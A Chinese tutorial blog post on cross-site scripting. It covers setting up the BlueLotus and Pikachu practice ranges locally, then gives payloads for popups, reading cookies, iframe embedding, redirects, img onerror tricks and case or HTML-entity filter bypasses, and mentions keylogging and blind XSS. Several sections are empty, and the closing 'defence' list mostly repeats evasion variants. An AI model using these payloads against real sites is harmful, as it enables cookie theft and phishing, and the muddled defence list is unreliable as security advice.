目录

  • XSS攻击简介
  • XSS攻击的危害
  • XSS攻击分类
  • XSS产生原因
  • 实战
    • 靶场搭建
    • 构造xss攻击脚本
      • 弹窗警告
      • 页面嵌套
      • 页面重定向
      • 弹窗警告并重定向
      • 图片标签利用
      • 绕开过滤的脚本
      • 存储型xss基本演示
      • 访问恶意代码(网站种马)
      • XSS获取键盘记录
      • XSS盲打
      • htmlspecialchars()函数
    • 自动xss攻击
  • 安全防御

XSS攻击简介

XSS漏洞攻防

XSS攻击的危害

1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
3、盗窃企业重要的具有商业价值的资料
4、非法转账
5、强制发送电子邮件
6、网站挂马 让更多人的受害
7、控制受害者机器向其它网站发起攻击 卖肉机

XSS攻击分类

XSS产生原因

实战

靶场搭建

BlueLotus
我这里选择的清华大学的是蓝莲花靶场(BlueLotus)
下载BlueLotus_XSSReceiver-master解压缩到PHPstudy的WWW目录下XSS漏洞攻防
然后打开PHPstudy
XSS漏洞攻防

成功之后是这样的
XSS漏洞攻防

然后访问本地ip,127.0.0.1:84
XSS漏洞攻防
点安装
设置密码,然后下拉点提交
XSS漏洞攻防
XSS漏洞攻防
输入密码登录
XSS漏洞攻防
登录界面
XSS漏洞攻防

构造xss攻击脚本

弹窗警告

<script>alert(1)</script>

XSS漏洞攻防
盗取用户cookie
<script>alert(document.cookie)</script>

XSS漏洞攻防

页面嵌套

<iframe style="overflow:hidden; width:520px;height:400px;position:fixed;left:500px;top:400px;border:none;margin:0px;padding:0px;"src="http://127.0.0.1:82/ "></iframe>
XSS漏洞攻防

页面重定向

<script> window.location= "https://www.baidu.com/" </script>
<script>location.href= "https://www.baidu.com/"</script>

弹窗警告并重定向

<script>alert("请移步到我们的新站");location.href="https://www.baidu.com/"</script>

XSS漏洞攻防
XSS漏洞攻防

图片标签利用

图像标签,有一定的隐蔽性
<img src= "#"  onerror= alert('欢迎来钓鱼')>

绕开过滤的脚本

绕开过滤的脚本
大小写 <ScrIpt>alert('xss')</SCRipt>
字符编码 字符编码采用URL、Base64、HTML等编码
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

可以用html编码进行绕过

存储型xss基本演示

危害最大的xss
写好一个脚本

XSS漏洞攻防

有了弹窗
XSS漏洞攻防
然后复制url再次打开发现弹窗还在,也就是说每一个访问这个网页的人都会弹出这个对话框
XSS漏洞攻防

访问恶意代码(网站种马)

XSS获取键盘记录

将rk.js改为自己ip
XSS漏洞攻防
然后在pikachuxss平台输入

这样只要用户在输入框输入点击提交,后台就会在pkxss_keypress_result.php文件中记录下来

XSS盲打

进入XSs盲打
XSS漏洞攻防随便输入
XSS漏洞攻防
输入
![!](https://img-blog.csdnimg.cn/7d7b47e3bb0e4f21b1f16c77e6617a9d.png)
访问http://127.0.0.1:81/vul/xss/xssblind/xss_blind.php输入账户密码。就还可以看到有一个弹窗
XSS漏洞攻防
然后点击确定后还有记录
XSS漏洞攻防

htmlspecialchars()函数

htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体
预定义的字符是:
&(和号) 成为&amp;
" (双引号) 成为 &quot;
' (单引号) 成为 &apos;
< (小于) 成为 &lt;
>  (大于) 成为 &gt;

XSS漏洞攻防
源码
XSS漏洞攻防

XSS漏洞攻防

自动xss攻击

安全防御

1.对重要的 cookie设置 httpOnly, 防止客户端通过document.cookie读取 cookie,此 HTTP头由服务端设置。

2.在javascript中加入多个tab键,得到
< IMG SRC=“jav ascript:alert(‘XSS’);” >;
  
3.在javascript中加入 编码字符,得到< IMG SRC=“javascript:alert(‘XSS’);” >;

4.在javascript中加入字符,得到
  < IMG SRC=“javascript:alert(‘XSS’);” >;

发表回复